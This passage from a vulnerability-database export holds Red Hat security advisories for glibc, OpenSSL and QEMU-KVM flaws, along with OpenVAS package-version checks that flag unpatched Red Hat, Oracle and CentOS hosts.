"2019-08-13T18:46:15", "bulletinFamily": "unix", "cvelist": ["CVE-2009-5029", "CVE-2009-5064", "CVE-2010-0296", "CVE-2010-0830", "CVE-2011-1071", "CVE-2011-1089", "CVE-2011-1095", "CVE-2011-1659", "CVE-2011-4609"], "description": "The glibc packages contain the standard C libraries used by multiple\nprograms on the system. These packages contain the standard C and the\nstandard math libraries. Without these two libraries, a Linux system cannot\nfunction properly.\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library read timezone files. If a\ncarefully-crafted timezone file was loaded by an application linked against\nglibc, it could cause the application to crash or, potentially, execute\narbitrary code with the privileges of the user running the application.\n(CVE-2009-5029)\n\nA flaw was found in the way the ldd utility identified dynamically linked\nlibraries. If an attacker could trick a user into running ldd on a\nmalicious binary, it could result in arbitrary code execution with the\nprivileges of the user running ldd. (CVE-2009-5064)\n\nIt was discovered that the glibc addmntent() function, used by various\nmount helper utilities, did not sanitize its input properly. A local\nattacker could possibly use this flaw to inject malformed lines into the\nmtab (mounted file systems table) file via certain setuid mount helpers, if\nthe attacker were allowed to mount to an arbitrary directory under their\ncontrol. (CVE-2010-0296)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library loaded ELF (Executable and Linking\nFormat) files. If a carefully-crafted ELF file was loaded by an\napplication linked against glibc, it could cause the application to crash\nor, potentially, execute arbitrary code with the privileges of the user\nrunning the application. (CVE-2010-0830)\n\nIt was discovered that the glibc fnmatch() function did not properly\nrestrict the use of alloca(). If the function was called on sufficiently\nlarge inputs, it could cause an application using fnmatch() to crash or,\npossibly, execute arbitrary code with the privileges of the application.\n(CVE-2011-1071)\n\nIt was found that the glibc addmntent() function, used by various mount\nhelper utilities, did not handle certain errors correctly when updating the\nmtab (mounted file systems table) file. If such utilities had the setuid\nbit set, a local attacker could use this flaw to corrupt the mtab file.\n(CVE-2011-1089)\n\nIt was discovered that the locale command did not produce properly escaped\noutput as required by the POSIX specification. If an attacker were able to\nset the locale environment variables in the environment of a script that\nperformed shell evaluation on the output of the locale command, and that\nscript were run with different privileges than the attacker's, it could\nexecute arbitrary code with the privileges of the script. (CVE-2011-1095)\n\nAn integer overflow flaw was found in the glibc fnmatch() function. If an\nattacker supplied a long UTF-8 string to an application linked against\nglibc, it could cause the application to crash. (CVE-2011-1659)\n\nA denial of service flaw was found in the remote procedure call (RPC)\nimplementation in glibc. A remote attacker able to open a large number of\nconnections to an RPC service that is using the RPC implementation from\nglibc, could use this flaw to make that service use an excessive amount of\nCPU time. (CVE-2011-4609)\n\nRed Hat would like to thank the Ubuntu Security Team for reporting\nCVE-2010-0830, and Dan Rosenberg for reporting CVE-2011-1089. The Ubuntu\nSecurity Team acknowledges Dan Rosenberg as the original reporter of\nCVE-2010-0830.\n\nThis update also fixes the following bug:\n\n* When using an nscd package that is a different version than the glibc\npackage, the nscd service could fail to start. This update makes the nscd\npackage require a specific glibc version to prevent this problem.\n(BZ#657009)\n\nUsers should upgrade to these updated packages, which resolve these issues.\n", "modified": "2017-09-08T12:12:17", "published": "2012-02-13T05:00:00", "id": "RHSA-2012:0125", "href": "https://access.redhat.com/errata/RHSA-2012:0125", "type": "redhat", "title": "(RHSA-2012:0125) Moderate: glibc security and bug fix update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:45:42", "bulletinFamily": "unix", "cvelist": ["CVE-2009-5064", "CVE-2011-1089"], "description": "The glibc packages contain the standard C libraries used by multiple\nprograms on the system. These packages contain the standard C and the\nstandard math libraries. Without these two libraries, a Linux system\ncannot function properly.\n\nA flaw was found in the way the ldd utility identified dynamically linked\nlibraries. If an attacker could trick a user into running ldd on a\nmalicious binary, it could result in arbitrary code execution with the\nprivileges of the user running ldd. (CVE-2009-5064)\n\nIt was found that the glibc addmntent() function, used by various mount\nhelper utilities, did not handle certain errors correctly when updating the\nmtab (mounted file systems table) file. If such utilities had the setuid\nbit set, a local attacker could use this flaw to corrupt the mtab file.\n(CVE-2011-1089)\n\nRed Hat would like to thank Dan Rosenberg for reporting the CVE-2011-1089\nissue.\n\nThis update also fixes several bugs and adds various enhancements.\nDocumentation for these bug fixes and enhancements will be available\nshortly from the Technical Notes document, linked to in the References\nsection.\n\nUsers are advised to upgrade to these updated glibc packages, which contain\nbackported patches to resolve these issues and add these enhancements.\n", "modified": "2018-06-06T20:24:09", "published": "2011-12-06T05:00:00", "id": "RHSA-2011:1526", "href": "https://access.redhat.com/errata/RHSA-2011:1526", "type": "redhat", "title": "(RHSA-2011:1526) Low: glibc security, bug fix, and enhancement update", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:45:51", "bulletinFamily": "unix", "cvelist": ["CVE-2009-5029", "CVE-2011-4609"], "description": "The glibc packages contain the standard C libraries used by multiple\nprograms on the system. These packages contain the standard C and the\nstandard math libraries. Without these two libraries, a Linux system cannot\nfunction properly.\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library read timezone files. If a\ncarefully-crafted timezone file was loaded by an application linked against\nglibc, it could cause the application to crash or, potentially, execute\narbitrary code with the privileges of the user running the application.\n(CVE-2009-5029)\n\nA denial of service flaw was found in the remote procedure call (RPC)\nimplementation in glibc. A remote attacker able to open a large number of\nconnections to an RPC service that is using the RPC implementation from\nglibc, could use this flaw to make that service use an excessive amount of\nCPU time. (CVE-2011-4609)\n\nThis update also fixes the following bugs:\n\n* glibc had incorrect information for numeric separators and groupings for\nspecific French, Spanish, and German locales. Therefore, applications\nutilizing glibc's locale support printed numbers with the wrong separators\nand groupings when those locales were in use. With this update, the\nseparator and grouping information has been fixed. (BZ#754116)\n\n* The RHBA-2011:1179 glibc update introduced a regression, causing glibc to\nincorrectly parse groups with more than 126 members, resulting in\napplications such as \"id\" failing to list all the groups a particular user\nwas a member of. With this update, group parsing has been fixed.\n(BZ#766484)\n\n* glibc incorrectly allocated too much memory due to a race condition\nwithin its own malloc routines. This could cause a multi-threaded\napplication to allocate more memory than was expected. With this update,\nthe race condition has been fixed, and malloc's behavior is now consistent\nwith the documentation regarding the MALLOC_ARENA_TEST and MALLOC_ARENA_MAX\nenvironment variables. (BZ#769594)\n\nUsers should upgrade to these updated packages, which contain backported\npatches to resolve these issues.\n", "modified": "2018-06-06T20:24:36", "published": "2012-01-24T05:00:00", "id": "RHSA-2012:0058", "href": "https://access.redhat.com/errata/RHSA-2012:0058", "type": "redhat", "title": "(RHSA-2012:0058) Moderate: glibc security and bug fix update", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-08-13T18:46:22", "bulletinFamily": "unix", "cvelist": ["CVE-2009-5029", "CVE-2011-4108", "CVE-2011-4576", "CVE-2011-4577", "CVE-2011-4609", "CVE-2011-4619", "CVE-2012-0029", "CVE-2012-0050", "CVE-2012-0056"], "description": "The rhev-hypervisor6 package provides a Red Hat Enterprise Virtualization\nHypervisor ISO disk image. The Red Hat Enterprise Virtualization Hypervisor\nis a dedicated Kernel-based Virtual Machine (KVM) hypervisor. It includes\neverything necessary to run and manage virtual machines: A subset of the\nRed Hat Enterprise Linux operating environment and the Red Hat Enterprise\nVirtualization Agent.\n\nNote: Red Hat Enterprise Virtualization Hypervisor is only available for\nthe Intel 64 and AMD64 architectures with virtualization extensions.\n\nA heap overflow flaw was found in the way QEMU-KVM emulated the e1000\nnetwork interface card. A privileged guest user in a virtual machine whose\nnetwork interface is configured to use the e1000 emulated driver could use\nthis flaw to crash the host or, possibly, escalate their privileges on the\nhost. (CVE-2012-0029)\n\nAn information leak flaw was found in the SSL 3.0 protocol implementation\nin OpenSSL. Incorrect initialization of SSL record padding bytes could\ncause an SSL client or server to send a limited amount of possibly\nsensitive data to its SSL peer via the encrypted connection.\n(CVE-2011-4576)\n\nA denial of service flaw was found in the RFC 3779 implementation in\nOpenSSL. A remote attacker could use this flaw to make an application using\nOpenSSL exit unexpectedly by providing a specially-crafted X.509\ncertificate that has malformed RFC 3779 extension data. (CVE-2011-4577)\n\nIt was discovered that OpenSSL did not limit the number of TLS/SSL\nhandshake restarts required to support Server Gated Cryptography. A remote\nattacker could use this flaw to make a TLS/SSL server using OpenSSL consume\nan excessive amount of CPU by continuously restarting the handshake.\n(CVE-2011-4619)\n\nRed Hat would like to thank Nicolae Mogoreanu for reporting CVE-2012-0029.\n\nThis updated package provides updated components that include fixes for\nvarious security issues. These issues have no security impact on Red Hat\nEnterprise Virtualization Hypervisor itself, however. The security fixes\nincluded in this update address the following CVE numbers:\n\nCVE-2009-5029 and CVE-2011-4609 (glibc issues)\n\nCVE-2012-0056 (kernel issue)\n\nCVE-2011-4108 and CVE-2012-0050 (openssl issues)\n\nThis update also fixes the following bugs:\n\n* Previously, it was possible to begin a Hypervisor installation without\nany valid disks to install to.\n\nNow, if no valid disks are found for Hypervisor installation, a message is\ndisplayed informing the user that there are no valid disks for\ninstallation. (BZ#781471)\n\n* Previously, the user interface for the Hypervisor did not indicate\nwhether the system was registered with Red Hat Network (RHN) Classic or RHN\nSatellite. As a result, customers could not easily determine the\nregistration status of their Hypervisor installations.\n\nThe TUI has been updated to display the registration status of the\nHypervisor. (BZ#788223)\n\n* Previously, autoinstall would fail if the firstboot or reinstall options\nwere passed but local_boot or upgrade were not passed. Now, neither the\nlocal_boot or upgrade parameters are required for autoinstall. (BZ#788225)\n\nUsers of the Red Hat Enterprise Virtualization Hypervisor are advised to\nupgrade to this updated package, which fixes these issues.\n", "modified": "2018-06-07T08:59:39", "published": "2012-02-15T05:00:00", "id": "RHSA-2012:0109", "href": "https://access.redhat.com/errata/RHSA-2012:0109", "type": "redhat", "title": "(RHSA-2012:0109) Important: rhev-hypervisor6 security and bug fix update", "cvss": {"score": 7.4, "vector": "AV:A/AC:M/Au:S/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2019-05-29T18:38:58", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4609", "CVE-2010-0830", "CVE-2009-5029", "CVE-2011-1089", "CVE-2009-5064"], "description": "The remote host is missing an update for the ", "modified": "2018-11-23T00:00:00", "published": "2012-02-21T00:00:00", "id": "OPENVAS:1361412562310870556", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310870556", "type": "openvas", "title": "RedHat Update for glibc RHSA-2012:0126-01", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for glibc RHSA-2012:0126-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2012-February/msg00027.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.870556\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-02-21 18:56:49 +0530 (Tue, 21 Feb 2012)\");\n script_cve_id(\"CVE-2009-5029\", \"CVE-2009-5064\", \"CVE-2010-0830\", \"CVE-2011-1089\",\n \"CVE-2011-4609\");\n script_tag(name:\"cvss_base\", value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"RHSA\", value:\"2012:0126-01\");\n script_name(\"RedHat Update for glibc RHSA-2012:0126-01\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'glibc'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_5\");\n script_tag(name:\"affected\", value:\"glibc on Red Hat Enterprise Linux (v. 5 server)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"insight\", value:\"The glibc packages contain the standard C libraries used by multiple\n programs on the system. These packages contain the standard C and the\n standard math libraries. Without these two libraries, a Linux system cannot\n function properly.\n\n An integer overflow flaw, leading to a heap-based buffer overflow, was\n found in the way the glibc library read timezone files. If a\n carefully-crafted timezone file was loaded by an application linked against\n glibc, it could cause the application to crash or, potentially, execute\n arbitrary code with the privileges of the user running the application.\n (CVE-2009-5029)\n\n A flaw was found in the way the ldd utility identified dynamically linked\n libraries. If an attacker could trick a user into running ldd on a\n malicious binary, it could result in arbitrary code execution with the\n privileges of the user running ldd. (CVE-2009-5064)\n\n An integer overflow flaw, leading to a heap-based buffer overflow, was\n found in the way the glibc library loaded ELF (Executable and Linking\n Format) files. If a carefully-crafted ELF file was loaded by an\n application linked against glibc, it could cause the application to crash\n or, potentially, execute arbitrary code with the privileges of the user\n running the application. (CVE-2010-0830)\n\n It was found that the glibc addmntent() function, used by various mount\n helper utilities, did not handle certain errors correctly when updating the\n mtab (mounted file systems table) file. If such utilities had the setuid\n bit set, a local attacker could use this flaw to corrupt the mtab file.\n (CVE-2011-1089)\n\n A denial of service flaw was found in the remote procedure call (RPC)\n implementation in glibc. A remote attacker able to open a large number of\n connections to an RPC service that is using the RPC implementation from\n glibc, could use this flaw to make that service use an excessive amount of\n CPU time. (CVE-2011-4609)\n\n Red Hat would like to thank the Ubuntu Security Team for reporting\n CVE-2010-0830, and Dan Rosenberg for reporting CVE-2011-1089. The Ubuntu\n Security Team acknowledges Dan Rosenberg as the original reporter of\n CVE-2010-0830.\n\n Users should upgrade to these updated packages, which resolve these issues.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"glibc\", rpm:\"glibc~2.5~65.el5_7.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-common\", rpm:\"glibc-common~2.5~65.el5_7.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-debuginfo\", rpm:\"glibc-debuginfo~2.5~65.el5_7.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-debuginfo-common\", rpm:\"glibc-debuginfo-common~2.5~65.el5_7.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-devel\", rpm:\"glibc-devel~2.5~65.el5_7.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-headers\", rpm:\"glibc-headers~2.5~65.el5_7.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-utils\", rpm:\"glibc-utils~2.5~65.el5_7.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nscd\", rpm:\"nscd~2.5~65.el5_7.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:29", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4609", "CVE-2010-0830", "CVE-2009-5029", "CVE-2011-1089", "CVE-2009-5064"], "description": "Oracle Linux Local Security Checks ELSA-2012-0126", "modified": "2018-09-28T00:00:00", "published": "2015-10-06T00:00:00", "id": "OPENVAS:1361412562310123990", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123990", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2012-0126", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2012-0126.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.123990\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:11:17 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2012-0126\");\n script_tag(name:\"insight\", value:\"ELSA-2012-0126 - glibc security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2012-0126\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2012-0126.html\");\n script_cve_id(\"CVE-2009-5064\", \"CVE-2011-1089\", \"CVE-2010-0830\", \"CVE-2009-5029\", \"CVE-2011-4609\");\n script_tag(name:\"cvss_base\", value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux5\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux5\")\n{\n if ((res = isrpmvuln(pkg:\"glibc\", rpm:\"glibc~2.5~65.el5_7.3\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"glibc-common\", rpm:\"glibc-common~2.5~65.el5_7.3\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"glibc-devel\", rpm:\"glibc-devel~2.5~65.el5_7.3\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"glibc-headers\", rpm:\"glibc-headers~2.5~65.el5_7.3\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"glibc-utils\", rpm:\"glibc-utils~2.5~65.el5_7.3\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"nscd\", rpm:\"nscd~2.5~65.el5_7.3\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-01-03T10:57:03", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4609", "CVE-2010-0830", "CVE-2009-5029", "CVE-2011-1089", "CVE-2009-5064"], "description": "Check for the Version of glibc", "modified": "2018-01-03T00:00:00", "published": "2012-02-21T00:00:00", "id": "OPENVAS:870556", "href": "http://plugins.openvas.org/nasl.php?oid=870556", "type": "openvas", "title": "RedHat Update for glibc RHSA-2012:0126-01", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for glibc RHSA-2012:0126-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The glibc packages contain the standard C libraries used by multiple\n programs on the system. These packages contain the standard C and the\n standard math libraries. Without these two libraries, a Linux system cannot\n function properly.\n\n An integer overflow flaw, leading to a heap-based buffer overflow, was\n found in the way the glibc library read timezone files. If a\n carefully-crafted timezone file was loaded by an application linked against\n glibc, it could cause the application to crash or, potentially, execute\n arbitrary code with the privileges of the user running the application.\n (CVE-2009-5029)\n\n A flaw was found in the way the ldd utility identified dynamically linked\n libraries. If an attacker could trick a user into running ldd on a\n malicious binary, it could result in arbitrary code execution with the\n privileges of the user running ldd. (CVE-2009-5064)\n\n An integer overflow flaw, leading to a heap-based buffer overflow, was\n found in the way the glibc library loaded ELF (Executable and Linking\n Format) files. If a carefully-crafted ELF file was loaded by an\n application linked against glibc, it could cause the application to crash\n or, potentially, execute arbitrary code with the privileges of the user\n running the application. (CVE-2010-0830)\n\n It was found that the glibc addmntent() function, used by various mount\n helper utilities, did not handle certain errors correctly when updating the\n mtab (mounted file systems table) file. If such utilities had the setuid\n bit set, a local attacker could use this flaw to corrupt the mtab file.\n (CVE-2011-1089)\n\n A denial of service flaw was found in the remote procedure call (RPC)\n implementation in glibc. A remote attacker able to open a large number of\n connections to an RPC service that is using the RPC implementation from\n glibc, could use this flaw to make that service use an excessive amount of\n CPU time. (CVE-2011-4609)\n\n Red Hat would like to thank the Ubuntu Security Team for reporting\n CVE-2010-0830, and Dan Rosenberg for reporting CVE-2011-1089. The Ubuntu\n Security Team acknowledges Dan Rosenberg as the original reporter of\n CVE-2010-0830.\n\n Users should upgrade to these updated packages, which resolve these issues.\";\n\ntag_affected = \"glibc on Red Hat Enterprise Linux (v. 5 server)\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2012-February/msg00027.html\");\n script_id(870556);\n script_version(\"$Revision: 8273 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-03 07:29:19 +0100 (Wed, 03 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-02-21 18:56:49 +0530 (Tue, 21 Feb 2012)\");\n script_cve_id(\"CVE-2009-5029\", \"CVE-2009-5064\", \"CVE-2010-0830\", \"CVE-2011-1089\",\n \"CVE-2011-4609\");\n script_tag(name:\"cvss_base\", value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"RHSA\", value: \"2012:0126-01\");\n script_name(\"RedHat Update for glibc RHSA-2012:0126-01\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of glibc\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"glibc\", rpm:\"glibc~2.5~65.el5_7.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-common\", rpm:\"glibc-common~2.5~65.el5_7.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-debuginfo\", rpm:\"glibc-debuginfo~2.5~65.el5_7.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-debuginfo-common\", rpm:\"glibc-debuginfo-common~2.5~65.el5_7.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-devel\", rpm:\"glibc-devel~2.5~65.el5_7.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-headers\", rpm:\"glibc-headers~2.5~65.el5_7.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-utils\", rpm:\"glibc-utils~2.5~65.el5_7.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nscd\", rpm:\"nscd~2.5~65.el5_7.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-06T13:06:39", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4609", "CVE-2010-0830", "CVE-2009-5029", "CVE-2011-1089", "CVE-2009-5064"], "description": "Check for the Version of glibc", "modified": "2018-01-05T00:00:00", "published": "2012-07-30T00:00:00", "id": "OPENVAS:881084", "href": "http://plugins.openvas.org/nasl.php?oid=881084", "type": "openvas", "title": "CentOS Update for glibc CESA-2012:0126 centos5 ", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for glibc CESA-2012:0126 centos5 \n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The glibc packages contain the standard C libraries used by multiple\n programs on the system. These packages contain the standard C and the\n standard math libraries. Without these two libraries, a Linux system cannot\n function properly.\n\n An integer overflow flaw, leading to a heap-based buffer overflow, was\n found in the way the glibc library read timezone files. If a\n carefully-crafted timezone file was loaded by an application linked against\n glibc, it could cause the application to crash or, potentially, execute\n arbitrary code with the privileges of the user running the application.\n (CVE-2009-5029)\n \n A flaw was found in the way the ldd utility identified dynamically linked\n libraries. If an attacker could trick a user into running ldd on a\n malicious binary, it could result in arbitrary code execution with the\n privileges of the user running ldd. (CVE-2009-5064)\n \n An integer overflow flaw, leading to a heap-based buffer overflow, was\n found in the way the glibc library loaded ELF (Executable and Linking\n Format) files. If a carefully-crafted ELF file was loaded by an\n application linked against glibc, it could cause the application to crash\n or, potentially, execute arbitrary code with the privileges of the user\n running the application. (CVE-2010-0830)\n \n It was found that the glibc addmntent() function, used by various mount\n helper utilities, did not handle certain errors correctly when updating the\n mtab (mounted file systems table) file. If such utilities had the setuid\n bit set, a local attacker could use this flaw to corrupt the mtab file.\n (CVE-2011-1089)\n \n A denial of service flaw was found in the remote procedure call (RPC)\n implementation in glibc. A remote attacker able to open a large number of\n connections to an RPC service that is using the RPC implementation from\n 